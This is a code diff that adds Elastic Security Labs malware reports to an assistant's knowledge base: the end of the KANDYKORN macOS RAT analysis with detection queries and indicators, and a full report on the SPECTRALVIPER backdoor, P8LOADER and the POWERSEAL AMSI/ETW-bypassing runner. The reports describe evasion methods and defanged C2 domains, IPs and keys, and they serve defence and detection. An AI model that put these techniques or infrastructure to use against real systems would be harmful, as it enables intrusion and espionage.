+* Stage 4 (KANDYKORN) - The final reflectively loaded payload. KANDYKORN is a full-featured memory resident RAT with built-in capabilities to:
+    * Conduct encrypted command and control
+    * Conduct system enumeration
+    * Upload and execute additional payloads
+    * Compress and exfil data
+    * Kill processes
+    * Run arbitrary system commands through an interactive pseudoterminal
+
+Elastic traced this campaign to April 2023 through the RC4 key used to encrypt the SUGARLOADER and KANDYKORN C2. This threat is still active and the tools and techniques are being continuously developed.
+
+## The Diamond Model
+
+Elastic Security utilizes the Diamond Model to describe high-level relationships between adversaries, capabilities, infrastructure, and victims of intrusions. While the Diamond Model is most commonly used with single intrusions, and leveraging Activity Threading (section 8) as a way to create relationships between incidents, an adversary-centered (section 7.1.4) approach allows for an, although cluttered, single diamond.
+
+![_REF7001 Diamond Model_](/assets/images/elastic-catches-dprk-passing-out-kandykorn/image30.jpg)
+
+
+## [Malware] and MITRE ATT&CK
+
+Elastic uses the [MITRE ATT&CK](https://attack.mitre.org/) framework to document common tactics, techniques, and procedures that advanced persistent threats used against enterprise networks.
+
+#### Tactics
+
+Tactics represent the why of a technique or sub-technique. It is the adversary’s tactical goal: the reason for performing an action.
+* [Execution](https://attack.mitre.org/tactics/TA0002)
+* [Persistence](https://attack.mitre.org/tactics/TA0003)
+* [Defense Evasion](https://attack.mitre.org/tactics/TA0005)
+* [Discovery](https://attack.mitre.org/tactics/TA0007)
+* [Collection](https://attack.mitre.org/tactics/TA0009)
+* [Command and Control](https://attack.mitre.org/tactics/TA0011)
+* [Exfiltration](https://attack.mitre.org/tactics/TA0010)
+
+#### Techniques
+
+Techniques represent how an adversary achieves a tactical goal by performing an action.
+* [User Execution: Malicious File](https://attack.mitre.org/techniques/T1204/002/)
+* [Command and Scripting Interpreter: Python](https://attack.mitre.org/techniques/T1059/006/)
+* [Command and Scripting Interpreter: Unix Shell](https://attack.mitre.org/techniques/T1059/004/)
+* [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574/)
+* [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140/)
+* [Hide Artifacts: Hidden Files and Directories](https://attack.mitre.org/techniques/T1564/001/)
+* [Indicator Removal: File Deletion](https://attack.mitre.org/techniques/T1070/004/)
+* [Masquerading: Match Legitimate Name or Location](https://attack.mitre.org/techniques/T1036/005/)
+* [Obfuscated Files or Information: Software Packing](https://attack.mitre.org/techniques/T1027/002/)
+* [Reflective Code Loading](https://attack.mitre.org/techniques/T1620/)
+* [File and Directory Discovery](https://attack.mitre.org/techniques/T1083/)
+* [Process Discovery](https://attack.mitre.org/techniques/T1057/)
+* [System Information Discovery](https://attack.mitre.org/techniques/T1082/)
+* [Archive Collected Data: Archive via Custom Method](https://attack.mitre.org/techniques/T1560/003/)
+* [Local Data Staging](https://attack.mitre.org/techniques/T1074/001/)
+* [Application Layer Protocol: Web Protocols](https://attack.mitre.org/techniques/T1071/001/)
+* [Fallback Channels](https://attack.mitre.org/techniques/T1008/)
+* [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105/)
+* [Exfiltration Over C2 Channel](https://attack.mitre.org/techniques/T1041/)
+
+## Malware prevention capabilities
+* [MacOS.Trojan.SUGARLOADER](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/MacOS_Trojan_SugarLoader.yar)
+* [MacOS.Trojan.HLOADER](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/MacOS_Trojan_HLoader.yar)
+* [MacOS.Trojan.KANDYKORN](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/MacOS_Trojan_KandyKorn.yar)
+
+## Malware detection capabilities
+
+### Hunting queries
+
+The events for EQL are provided with the Elastic Agent using the Elastic Defend integration. Hunting queries could return high signals or false positives. These queries are used to identify potentially suspicious behavior, but an investigation is required to validate the findings.
+
+#### EQL queries
+
+Using the Timeline section of the Security Solution in Kibana under the “Correlation” tab, you can use the below EQL queries to hunt for similar behaviors.
+
+The following EQL query can be used to identify when a hidden executable creates and then immediately deletes a file within a temporary directory:
+
+```
+sequence by process.entity_id, file.path with maxspan=30s
+  [file where event.action == "modification" and process.name : ".*" and 
+   file.path : ("/private/tmp/*", "/tmp/*", "/var/tmp/*")]
+  [file where event.action == "deletion" and process.name : ".*" and 
+   file.path : ("/private/tmp/*", "/tmp/*", "/var/tmp/*")]
+```
+
+The following EQL query can be used to identify when a hidden file makes an outbound network connection followed by the immediate download of an executable file:
+
+```
+sequence by process.entity_id with maxspan=30s
+[network where event.type == "start" and process.name : ".*"]
+[file where event.action != "deletion" and file.Ext.header_bytes : ("cffaedfe*", "cafebabe*")]
+```
+
+The following EQL query can be used to identify when a macOS application binary gets renamed to a hidden file name within the same directory:
+
+```
+file where event.action == "rename" and file.name : ".*" and 
+ file.path : "/Applications/*/Contents/MacOS/*" and 
+ file.Ext.original.path : "/Applications/*/Contents/MacOS/*" and 
+ not startswith~(file.Ext.original.path,Effective_process.executable)
+ ```
+
+The following EQL query can be used to identify when an IP address is supplied as an argument to a hidden executable:
+
+```
+sequence by process.entity_id with maxspan=30s
+[process where event.type == "start" and event.action == "exec" and process.name : ".*" and process.args regex~ "[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}"]
+[network where event.type == "start"]
+```
+
+The following EQL query can be used to identify the rename or modification of a hidden executable file within the /Users/Shared directory or the execution of a hidden unsigned or untrusted process in the /Users/Shared directory:
+
+```
+any where 
+ (
+  (event.category : "file" and event.action != "deletion" and file.Ext.header_bytes : ("cffaedfe*", "cafebabe*") and 
+   file.path : "/Users/Shared/*" and file.name : ".*" ) or 
+  (event.category : "process" and event.action == "exec" and process.executable : "/Users/Shared/*" and 
+   (process.code_signature.trusted == false or process.code_signature.exists == false) and process.name : ".*")
+ )
+```
+
+The following EQL query can be used to identify when a URL is supplied as an argument to a python script via the command line:
+
+```
+sequence by process.entity_id with maxspan=30s
+[process where event.type == "start" and event.action == "exec" and 
+ process.args : "python*" and process.args : ("/Users/*", "/tmp/*", "/var/tmp/*", "/private/tmp/*") and process.args : "http*" and 
+ process.args_count &lt;= 3 and 
+ not process.name : ("curl", "wget")]
+[network where event.type == "start"]
+```
+
+The following EQL query can be used to identify the attempt of in memory Mach-O loading specifically by looking for the predictable temporary file creation of "NSCreateObjectFileImageFromMemory-*":
+
+```
+file where event.type != "deletion" and 
+file.name : "NSCreateObjectFileImageFromMemory-*"
+```
+
+The following EQL query can be used to identify the attempt of in memory Mach-O loading by looking for the load of the "NSCreateObjectFileImageFromMemory-*" file or a load with no dylib name provided:
+
+```
+any where ((event.action == "load" and not dll.path : "?*") or 
+  (event.action == "load" and dll.name : "NSCreateObjectFileImageFromMemory*"))
+```
+
+### YARA
+
+Elastic Security has created YARA rules to identify this activity. Below are YARA rules to identify the payloads:
+* [MacOS.Trojan.SUGARLOADER](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/MacOS_Trojan_SugarLoader.yar)
+* [MacOS.Trojan.HLOADER](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/MacOS_Trojan_HLoader.yar)
+* [MacOS.Trojan.KANDYKORN](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/MacOS_Trojan_KandyKorn.yar)
+
+## Observations
+
+All observables are also available for [download](https://github.com/elastic/labs-releases/tree/main/indicators/ref7001) in both ECS and STIX format. 
+
+The following observables were discussed in this research.
+
+| Observable                                                                                                                       | Type         | Name                | Reference               |
+|----------------------------------------------------------------------------------------------------------------------------------|--------------|---------------------|-------------------------|
+| `3ea2ead8f3cec030906dcbffe3efd5c5d77d5d375d4a54cca03bfe8a6cb59940`                                                                 | SHA-256      | .log, .sld          | SUGARLOADER             |
+| `2360a69e5fd7217e977123c81d3dbb60bf4763a9dae6949bc1900234f7762df1`                                                                | SHA-256      | Discord (fake)      | HLOADER                 |
+| `927b3564c1cf884d2a05e1d7bd24362ce8563a1e9b85be776190ab7f8af192f6`                                                                 | SHA-256      |                     | KANDYKORN               |
+| `http://tp-globa[.]xyz//OdhLca1mLUp/lZ5rZPxWsh/7yZKYQI43S/fP7savDX6c/bfC`                                                          | url          |                     | FinderTools C2 URL      |
+| `tp-globa[.]xyz`                                                                                                                   | domain-name  |                     | FinderTools C2 domain   |
+| `192.119.64[.]43`                                                                                                                  | ipv4-addr    | tp-globa IP address | FinderTools C2 IP       |
+| `23.254.226[.]90`                                                                                                                  | ipv4-addr    |                     | SUGARLOADER C2 IP       |
+| `D9F936CE628C3E5D9B3695694D1CDE79E470E938064D98FBF4EF980A5558D1C90C7E650C2362A21B914ABD173ABA5C0E5837C47B89F74C5B23A7294CC1CFD11B` | 64 byte key  | RC4 key             | SUGARLOADER, KANDYKORN  |
+
+## References
+
+The following were referenced throughout the above research:
+* [The DPRK strikes using a new variant of RUSTBUCKET — Elastic Security Labs](https://www.elastic.co/security-labs/DPRK-strikes-using-a-new-variant-of-rustbucket) 
+* [https://x.com/tiresearch1/status/1708141542261809360](https://x.com/tiresearch1/status/1708141542261809360) 
+* [https://www.reddit.com/r/hacking/comments/15b4uti/comment/jtprebt/](https://www.reddit.com/r/hacking/comments/15b4uti/comment/jtprebt/) 
+* [Looks like a try to steel some data : r/Malware](https://www.reddit.com/r/Malware/comments/15b595e/looks_like_a_try_to_steel_some_data/) 
+* [https://www.reddit.com/r/pihole/comments/15d11do/malware_project_mimics_pihole/jtzmpqh/](https://www.reddit.com/r/pihole/comments/15d11do/malware_project_mimics_pihole/jtzmpqh/) 
+* [Lazarus Group Goes 'Fileless'](https://objective-see.org/blog/blog_0x51.html)
+* [Understanding and Defending Against Reflective Code Loading on macOS | by Justin Bui](https://slyd0g.medium.com/understanding-and-defending-against-reflective-code-loading-on-macos-e2e83211e48f)
+* [macOS reflective code loading analysis · hackd](https://hackd.net/posts/macos-reflective-code-loading-analysis/)
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/elastic_charms_spectralviper.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/elastic_charms_spectralviper.md
new file mode 100644
index 0000000000000..3c728cc365fc6
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/elastic_charms_spectralviper.md
@@ -0,0 +1,559 @@
+---
+title: "Elastic charms SPECTRALVIPER"
+slug: "elastic-charms-spectralviper"
+date: "2023-06-09"
+subtitle: "Elastic Security Labs has discovered the SPECTRALVIPER malware targeting a national Vietnamese agribusiness."
+description: "Elastic Security Labs has discovered the P8LOADER, POWERSEAL, and SPECTRALVIPER malware families targeting a national Vietnamese agribusiness. REF2754 shares malware and motivational elements of the REF4322 and APT32 activity groups."
+author:
+  - slug: cyril-francois
+  - slug: daniel-stepanic
+  - slug: seth-goodwin
+image: "photo-edited-10@2x.jpg"
+category:
+  - slug: malware-analysis
+  - slug: campaigns
+tags:
+  - ref2754
+  - spectralviper
+  - p8loader
+  - powerseal
+---
+
+## Key takeaways
+
+- The REF2754 intrusion set leverages multiple PE loaders, backdoors, and PowerShell runners
+- SPECTRALVIPER is a heavily obfuscated, previously undisclosed, x64 backdoor that brings PE loading and injection, file upload and download, file and directory manipulation, and token impersonation capabilities
+- We are attributing REF2754 to a Vietnamese-based intrusion set and aligning with the Canvas Cyclone/APT32/OceanLotus threat actor
+
+## Preamble
+
+Elastic Security Labs has been tracking an intrusion set targeting large Vietnamese public companies for several months, REF2754. During this timeframe, our team discovered new malware being used in coordination by a state-affiliated actor.
+
+This research discusses:
+
+- The SPECTRALVIPER malware
+- The P8LOADER malware loader
+- The POWERSEAL malware
+- Campaign and intrusion analysis of REF2754
+
+## Execution flow
+
+The first event recorded was the creation of a file (**C:\Users\Public\Libraries\dbg.config)** by the System service dropped over SMB from a previously compromised endpoint. The adversary renamed the SysInternals ProcDump utility, used for collecting memory metadata from running processes, to masquerade as the Windows debugger utility ( **windbg.exe** ). Using the renamed ProcDump application with the **-md** flag, the adversary loaded **dbg.config** , an unsigned DLL containing malicious code.
+
+It should be noted, the ProcDump LOLBAS [technique](https://lolbas-project.github.io/lolbas/OtherMSBinaries/Procdump/) requires a valid process in the arguments; so while **winlogon.exe** is being included in the arguments, it is being used because it is a valid process, not that it is being targeted for collection by ProcDump.
+
+![ProcDump masquerading as WinDbg.exe](/assets/images/elastic-charms-spectralviper/image22.jpg)
+
+The unsigned DLL (**dbg.config)** contained DONUTLOADER shellcode which it attempted to inject into **sessionmsg.exe** , the Microsoft Remote Session Message Server. DONUTLOADER was configured to load the SPECTRALVIPER backdoor, and ultimately the situationally-dependent P8LOADER or POWERSEAL malware families. Below is the execution flow for the REF2754 intrusion set.
+
+![REF2754 execution flow](/assets/images/elastic-charms-spectralviper/image16.png)
+
+Our team also observed a similar workflow described above, but with different techniques to proxy their malicious execution. One example leveraged the Internet Explorer program ( **ExtExport.exe** ) to load a DLL, while another technique involved side-loading a malicious DLL ( **dnsapi.dll** ) using a legitimate application ( **nslookup.exe** ).
+
+These techniques and malware families make up the REF2754 intrusion set.
+
+## SPECTRALVIPER code analysis
+
+### Overview
+
+During our investigation, we observed a previously-undiscovered backdoor malware family that we’re naming SPECTRALVIPER. SPECTRALVIPER is a 64-bit Windows backdoor coded in C++ and heavily obfuscated. It operates with two distinct communication modes, allowing it to receive messages either via HTTP or a Windows named pipe.
+
+Through our analysis, we have identified the following capabilities:
+
+- **PE loading/Injection** : SPECTRALVIPER can load and inject executable files, supporting both x86 and x64 architectures. This capability enables it to execute malicious code within legitimate processes.
+- **Token Impersonation** : The malware possesses the ability to impersonate security tokens, granting it elevated privileges and bypassing certain security measures. This enables unauthorized access and manipulation of sensitive resources.
+- **File downloading/uploading** : SPECTRALVIPER can download and upload files to and from the compromised system. This allows the attacker to exfiltrate data or deliver additional malicious payloads to the infected machine.
+- **File/directory manipulation** : The backdoor is capable of manipulating files and directories on the compromised system. This includes creating, deleting, modifying, and moving files or directories, providing the attacker with extensive control over the victim's file system.
+
+![SPECTRALVIPER overview](/assets/images/elastic-charms-spectralviper/image30.jpg)
+
+### Execution flow
+
+#### Launch
+
+SPECTRALVIPER can be compiled as a PE executable or DLL file. Launching the malware as a PE is straightforward by executing **.\spectralviper.exe**.
+
+However, when the malware is a DLL it will attempt to disguise itself as a legitimate library with known exports such as sqlite3 in our observed sample.
+
+![SPECTRALVIPER DLL sample exports](/assets/images/elastic-charms-spectralviper/image14.jpg)
+
+The SPECTRALVIPER entrypoint is hidden within these exports. In order to find the right one, we can brute-force call them using PowerShell and [rundll-ng](https://github.com/BenjaminSoelberg/RunDLL-NG). The PowerShell command depicted below calls each SPECTRALVIPER export in a **for** loop until we find the one launching the malware capabilities.
+
+```
+for($i=0; $i -lt 20; $i++){.\rundll-ng\rundll64-ng.exe ".\7e35ba39c2c77775b0394712f89679308d1a4577b6e5d0387835ac6c06e556cb.dll" "#$i"}
+```
+
+![Brute-forcing calls to SPECTRALVIPER exports](/assets/images/elastic-charms-spectralviper/image33.jpg)
+
+Upon execution, the binary operates in either HTTP mode or pipe mode, determined by its hardcoded configuration.
+
+#### Pipe mode
+
+In pipe mode, SPECTRALVIPER opens a named pipe with a hardcoded name and waits for incoming commands, in this example **\\.\pipe\raSeCIR4gg**.
+
+![SPECTRALVIPER sample operating in pipe mode](/assets/images/elastic-charms-spectralviper/image19.jpg)
+
+This named pipe doesn’t have any security attributes meaning it’s accessible by everyone. This is interesting because an unsecured named pipe can be overtaken by a co-resident threat actor (either known or unknown to the SPECTRALVIPER operator) or defensive teams as a way to interrupt this execution mode.
+
+![SPECTRALVIPER’s pipe security attributes](/assets/images/elastic-charms-spectralviper/image6.jpg)
+
+However, a specific protocol is needed to communicate with this pipe. SPECTRALVIPER implements the [Diffie-Helman key exchange protocol](https://en.wikipedia.org/wiki/Diffie%E2%80%93Hellman_key_exchange) to exchange the key needed to encrypt and decrypt commands transmitted via the named pipe, which is AES-encrypted.
+
+#### HTTP mode
+
+In HTTP mode, the malware will beacon to its C2 every _n_ seconds, the interval period is generated randomly in a range between 10 and 99 seconds.
+
+![SPECTRALVIPER’s other sample operates in HTTP mode](/assets/images/elastic-charms-spectralviper/image20.jpg)
+
+Using a debugger, we can force the binary to use the HTTP channel instead of the named pipe if the binary contains a hard-coded domain.
+
+![Debugging SPECTRALVIPER to force the HTTP mode](/assets/images/elastic-charms-spectralviper/image28.jpg)
+
+Below is an HTTP request example.
+
+![SPECTRALVIPER HTTP request example](/assets/images/elastic-charms-spectralviper/image15.jpg)
+
+The request contains a cookie header, “ **euconsent-v2** ”, which contains host-gathered information. This information is encrypted using RSA1024 asymmetric encryption and base64-encoded using Base64. Below is an example of the cookie content before encryption.
+
+![Cookie data pre RSA1024 encryption](/assets/images/elastic-charms-spectralviper/image10.jpg)
+
+We believe that the first value, in this example “ **H9mktfe2k0ukk64nZjw1ow==** ”, is the randomly generated AES key that is shared with the server to encrypt communication data.
+
+### Commands
+
+While analyzing SPECTRALVIPER samples we discovered its command handler table containing between 33 and 36 handlers.
+
+![SPECTRALVIPER registering command handlers](/assets/images/elastic-charms-spectralviper/image17.jpg)
+
+Below is a table listing of the commands that were identified.
+
+| ID  | Name                                         |
+| --- | -------------------------------------------- |
+| 2   | DownloadFile                                 |
+| 3   | UploadFile                                   |
+| 5   | SetBeaconIntervals                           |
+| 8   | CreateRundll32ProcessAndHollow               |
+| 11  | InjectShellcodeInProcess                     |
+| 12  | CreateProcessAndInjectShellcode              |
+| 13  | InjectPEInProcess                            |
+| 14  | CreateProcessAndHollow                       |
+| 20  | CreateRundll32ProcessWithArgumentAndInjectPE |
+| 81  | StealProcessToken                            |
+| 82  | ImpersonateUser                              |
+| 83  | RevertToSelf                                 |
+| 84  | AdjustPrivileges                             |
+| 85  | GetCurrentUserName                           |
+| 103 | ListFiles                                    |
+| 106 | ListRunningProcesses                         |
+| 108 | CopyFile                                     |
+| 109 | DeleteFile                                   |
+| 110 | CreateDirectory                              |
+| 111 | MoveFile                                     |
+| 200 | RunDLLInOwnProcess                           |
+
+In order to speed up the process of interacting with SPECTRALVIPER, we bypassed the communication protocols and injected our own backdoor into the binary. This backdoor will open a socket and call the handlers upon receiving our messages.
+
+![Injecting our backdoor to call SPECTRALVIPER handlers](/assets/images/elastic-charms-spectralviper/image13.jpg)
+
+When the **AdjustPrivileges** command is executed, and depending on the process's current privilege level, the malware will try to set the following list of privileges.
+
+![SPECTRALVIPER setting privileges](/assets/images/elastic-charms-spectralviper/image3.jpg)
+
+### Defense evasion
+
+#### Code obfuscation
+
+The binary code is heavily obfuscated by splitting each function into multi-level dummy functions that encapsulate the initial logic. On top of that, the control flow of those functions is also obfuscated using control flow flattening. [Control flow flattening](https://news.sophos.com/en-us/2022/05/04/attacking-emotets-control-flow-flattening/) is an obfuscation technique that removes clean program structures and places the blocks next to each other inside a loop with a switch statement to control the flow of the program.
+
+Below is an example of a second-level identity function where the highlighted parameter **p_a1** is just returned despite the complexity of the function.
+
+![SPECTRALVIPER obfuscated function example](/assets/images/elastic-charms-spectralviper/image21.jpg)
+
+#### String obfuscation
+
+SPECTRALVIPER’s strings are obfuscated using a custom structure and AES decryption. The key is hardcoded ( **"\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f"** ) and the IV is contained within the encrypted string structure.
+
+![Encrypted string structure 1/2](/assets/images/elastic-charms-spectralviper/image24.jpg)
+
+![Encrypted string structure 2/2](/assets/images/elastic-charms-spectralviper/image2.jpg)
+
+We can decrypt the strings by instrumenting the malware and calling its AES decryption functions.
+
+![Decrypting strings by instrumenting the binary 1/2](/assets/images/elastic-charms-spectralviper/image27.jpg)
+
+![Decrypting strings by instrumenting the binary 2/2](/assets/images/elastic-charms-spectralviper/image31.png)
+
+### Summary
+
+SPECTRALVIPER is an x64 backdoor discovered during intrusion analysis by Elastic Security Labs. It can be compiled as an executable or DLL which usually would imitate known binary exports.
+
+It enables process loading/injection, token impersonation, and file manipulation. It utilizes encrypted communication channels (HTTP and named pipe) with AES encryption and Diffie-Hellman or RSA1024 key exchange.
+
+All samples are heavily obfuscated using the same obfuscator with varying levels of hardening.
+
+Using the information we collected through static and dynamic analysis, we were able to identify several other samples in VirusTotal. Using the debugging process outlined above, we were also able to collect the C2 infrastructure for these samples.
+
+## P8LOADER
+
+### Overview
+
+The Portable Executable (PE) described below is a Windows x64 PE loader, written in C++, which we are naming P8LOADER after one of its exports, **P8exit**.
+
+![P8exit export name](/assets/images/elastic-charms-spectralviper/image5.jpg)
+
+### Discovery
+
+P8LOADER was initially discovered when an unbacked shellcode alert was generated by the execution of a valid Windows process, **RuntimeBroker.exe**. Unbacked executable sections, or _floating code_, are the result of code section types set to “Private” instead of “Image” like you would see when code is mapped to a file on disk. Threads starting from these types of memory regions are anomalous and a good indicator of malicious activity.
+
+![P8LOADER unbacked observation](/assets/images/elastic-charms-spectralviper/image1.jpg)
+
+> If you want to learn more about unbacked executable events, check out the [Hunting in Memory research](https://www.elastic.co/security-labs/hunting-memory) publication by Joe Desimone.
+
+### Execution flow
+
+The loader exports two functions that have the capability to load PE binaries into its own process memory, either from a file or from memory.
+
+![P8LOADER functions](/assets/images/elastic-charms-spectralviper/image26.jpg)
+
+The PE to be executed is loaded into memory using the **VirtualAlloc** method with a classic PE loading algorithm (loading sections, resolving imports, and applying relocations).
+
+![P8LOADER loading the PE to be executed](/assets/images/elastic-charms-spectralviper/image9.jpg)
+
+Next, a new thread is allocated with the entry point of the PE as the starting address.
+
+![P8LOADER setting the PE starting address](/assets/images/elastic-charms-spectralviper/image34.jpg)
+
+Finally, the loaded PE’s STDOUT handle is replaced with a pipe and a reading pipe thread is created as a way to redirect the output of the binary to the loader logging system.
+
+![P8LOADER redirecting to the loader logging system](/assets/images/elastic-charms-spectralviper/image29.jpg)
+
+On top of redirecting the loaded PE output, the loader uses an API interception mechanism to hook certain APIs of the loaded process, log any calls to it, and send the data through a named pipe (with a randomly generated UUID string as the name).
+
+The hooking of the PE's import table is done at import resolution time by replacing the originally imported function addresses with their own stub.
+
+### Defense evasion
+
+#### String obfuscation
+
+P8LOADER uses a C++ template-based obfuscation technique to obscure errors and debug strings with a set of different algorithms chosen randomly at compile time.
+
+These strings are obfuscated to hinder analysis as they provide valuable information about the loader functions and capabilities.
+
+![String decryption algorithm example 1/3](/assets/images/elastic-charms-spectralviper/image7.png)
+
+![String decryption algorithm example 2/3](/assets/images/elastic-charms-spectralviper/image23.png)
+
+![String decryption algorithm example 3/3](/assets/images/elastic-charms-spectralviper/image25.jpg)
+
+### Summary
+
+P8LOADER is a newly discovered x64 Windows loader that is used to execute a PE from a file or from memory. This malware is able to redirect the loaded PE output to its logging system and hook the PE imports to log import calls.
+
+## POWERSEAL code analysis
+
+### Overview
+
+During this intrusion, we observed a lightweight .NET PowerShell runner that we call POWERSEAL based on embedded strings. After SPECTRALVIPER was successfully deployed, the POWERSEAL utility would be used to launch supplied PowerShell scripts or commands. The malware leverages syscalls ( **NtWriteVirtualMemory** ) for evading defensive solutions (AMSI/ETW).
+
+![POWERSEAL Classes/Functions](/assets/images/elastic-charms-spectralviper/image11.jpg)
+
+### Defense evasion
+
+Event Tracing for Windows (ETW) provides a mechanism to trace and log events that are raised by user-mode applications and kernel-mode drivers. The Anti Malware Scan Interface (AMSI) provides enhanced malware protection for data, applications, and workloads. POWERSEAL adopts well-known and publicly-available bypasses in order to patch these technologies in memory. This increases their chances of success while decreasing their detectable footprint.
+
+For example, POWERSEAL employs [common approaches to unhooking and bypassing AMSI](https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/) in order to bypass Microsoft Defender’s signature
+
+![POWERSEAL bypassing AMSI](/assets/images/elastic-charms-spectralviper/image8.jpg)
+
+### Launch PowerShell
+
+POWERSEAL’s primary function is to execute PowerShell. In the following depiction of POWERSEAL’s source code, we can see that POWERSEAL uses PowerShell to execute a script and arguments ( **command** ). The script and arguments are provided by the threat actor and were not observed in the environment.
+
+![POWERSEAL executing shellcode with PowerShell](/assets/images/elastic-charms-spectralviper/image32.jpg)
+
+### Summary
+
+POWERSEAL is a new and purpose-built PowerShell runner that borrows freely from a variety of open source offensive security tools, delivering offensive capabilities in a streamlined package with built-in defense evasion.
+
+## Campaign and adversary modeling
+
+### Overview
+
+REF2754 is an ongoing campaign against large nationally important public companies within Vietnam. The malware execution chain in this campaign is initiated with DONUTLOADER, but goes on to utilize previously unreported tooling.
+
+1. SPECTRALVIPER, an obfuscated x64 backdoor that brings PE loading and injection, file upload and download, file and directory manipulation, token impersonation, and named pipe and HTTP command and control
+2. P8LOADER, an obfuscated Windows PE loader allowing the attacker to minimize and obfuscate some logging on the victim endpoints, and
+3. POWERSEAL, a PowerShell runner with ETW and AMSI bypasses built in for enhanced defensive evasion when using PowerShell tools
+
+Elastic Security Labs concludes with moderate confidence that this campaign is executed by a Vietnamese state-affiliated threat.
+
+![REF2754 and REF4322 campaign intersections](/assets/images/elastic-charms-spectralviper/image4.png)
+
+### Victimology
+
+Using our SPECTRALVIPER YARA signature, we identified two endpoints in a second environment infected with SPECTRALVIPER implants. That environment was discussed in Elastic Security Labs research in 2022 which describes [REF4322](https://www.elastic.co/security-labs/phoreal-malware-targets-the-southeast-asian-financial-sector).
+
+The REF4322 victim is a Vietnam-based financial services company. Elastic Security Labs first talked about this victim and activity group in 2022.
+
+The REF2754 victim has been identified as a large Vietnam-based agribusiness.
+
+Further third party intelligence from VirusTotal, based on retro-hunting the YARA rules available at the end of this research, indicate additional Vietnam-based victims. There were eight total Retrohunt hits:
+
+- All were manually confirmed to be SPECTRALVIPER
+- All samples were between 1.59MB and 1.77MB in size
+- All VirusTotal samples were initially submitted from Vietnam
+
+Some samples were previously identified in our first party collection, and some were new to us.
+
+> Be mindful of the analytic limitations of relying on “VT submitter” too heavily. This third party reporting mechanism may be subject to circular reporting concerns or VPN usage that modifies the GEOs used, and inadvertent reinforcement of a hypothesis. In this case, it was used in an attempt to try to find samples with apparent non-VN origins, without success.
+
+At the time of publication, all known victims are large public companies physically within Vietnam, and conducting business primarily within Vietnam.
+
+### Campaign analysis
+
+The overlap with the REF4322 environment occurred fairly recently, on April 20, 2023. One of these endpoints was previously infected with the PHOREAL implant, while the other endpoint was compromised with PIPEDANCE.
+
+These SPECTRALVIPER infections were configured under pipe mode as opposed to hardcoded domains set to wait for incoming connection over a named pipe ( **\\.\pipe\ydZb0bIrT** ).
+
+![SPECTRALVIPER coresident on a PIPEDANCE-infected host](/assets/images/elastic-charms-spectralviper/image18.jpg)
+
+This activity appears to be a handoff of access or swapping out of one tool for another.
+
+> If you’re interested in a detailed breakdown of the PIPEDANCE malware, check out our [previous research](https://www.elastic.co/security-labs/twice-around-the-dance-floor-with-pipedance) and stay tuned, more to come.
+
+Post-exploitation collection of intended effects has been limited, however, while speculative in nature, a motivation assessment based on malware, implant, and technical capabilities points to achieving initial access, maintaining persistence, and operating as a backdoor for intelligence gathering purposes.
+
+Domains from REF4322, REF2754, and from samples collected from VirusTotal used for C2 have all been registered in the last year with the most recent being in late April 2023.
+
+| Domain:                          | Created:   |
+| -------------------------------- | ---------- |
+| stablewindowsapp[.]com           | 2022-02-10 |
+| webmanufacturers[.]com           | 2022-06-10 |
+| toppaperservices[.]com           | 2022-12-15 |
+| hosting-wordpress-services[.]com | 2023-03-15 |
+| appointmentmedia[.]com           | 2023-04-26 |
+
+GEOs for associated IPs for these domains are globally distributed, and they use Sectigo, Rapid SSL, and Let’s Encrypt certs. Further infrastructure analysis did not uncover anything of note beyond their registration date, which does give us a campaign timebox. Based on the recent registration of **appointmentmedia[.]com**, this campaign could still be ongoing with new domains being registered for future intrusions.
+
+### Campaign associations
+
+Elastic Security Labs concludes with moderate confidence that both REF4322 and REF2754 activity groups represent campaigns planned and executed by a Vietnamese state-affiliated threat. Based on our analysis, this activity group overlaps with prior reporting of Canvas Cyclone, APT32, and OCEANLOTUS threat groups.
+
+As stated above and in previous reporting, the REF4322 victim is a financial institution that manages capital for business acquisitions and former State-Owned-Enterprises.
+
+The REF2754 victim is a large agribusiness that is systemically important in the food production and distribution supply chains of Vietnam. Ongoing urbanization, pollution, the COVID-19 pandemic, and climate change have been challenges for Vietnam’s food security. As a data point, in March of 2023, Vietnam’s Prime Minister [approved](https://apps.fas.usda.gov/newgainapi/api/Report/DownloadReportByFileName?fileName=Vietnam%20Issues%20National%20Action%20Plan%20on%20Food%20Systems%20Transformation%20toward%20Transparency%20Responsibility%20and%20Sustainability%20by%202030_Hanoi_Vietnam_VM2023-0017.pdf) the National Action Plan on Food Systems Transformation toward Transparency, Responsibility, and Sustainability in Vietnam by 2030. Its overall objective is to transform the food systems including production, processing, distribution, and consumption towards transparency, responsibility, and sustainability based on local advantages; to ensure national food and nutrition security; to improve people's income and living standards; to prevent and control natural disasters and epidemics; to protect the environment and respond to climate change; and finally to contribute to the rolling-out of the Vietnam and Global Sustainable Development Goals by 2030. All of this highlights that food security has been a point of national policy emphasis, which also makes the victims of REF2754 an attractive target to threat actors because of their intersection with Vietnam’s strategic objectives.
+
+In addition to the nationally-aligned strategic interests of the victims for REF4322 and REF2754, both victims were infected with the DONUTLOADER, P8LOADER, POWERSEAL, and SPECTRALVIPER malware families using similar deployment techniques, implant management, and naming conventions in both intrusions.
+
+A threat group with access to the financial transaction records available in REF4322, combined with the national strategic food safety policy for REF2754 would provide insight into competency of management, corruption, foreign influence, or price manipulations otherwise unavailable through regulatory reporting.
+
+### Diamond model
+
+Elastic Security utilizes the [Diamond Model](https://www.activeresponse.org/wp-content/uploads/2013/07/diamond.pdf) to describe high-level relationships between the adversaries, capabilities, infrastructure, and victims of intrusions. While the Diamond Model is most commonly used with single intrusions, and leveraging Activity Threading (section 8) as a way to create relationships between incidents, an adversary-centered (section 7.1.4) approach allows for a (cluttered) single diamond.
+
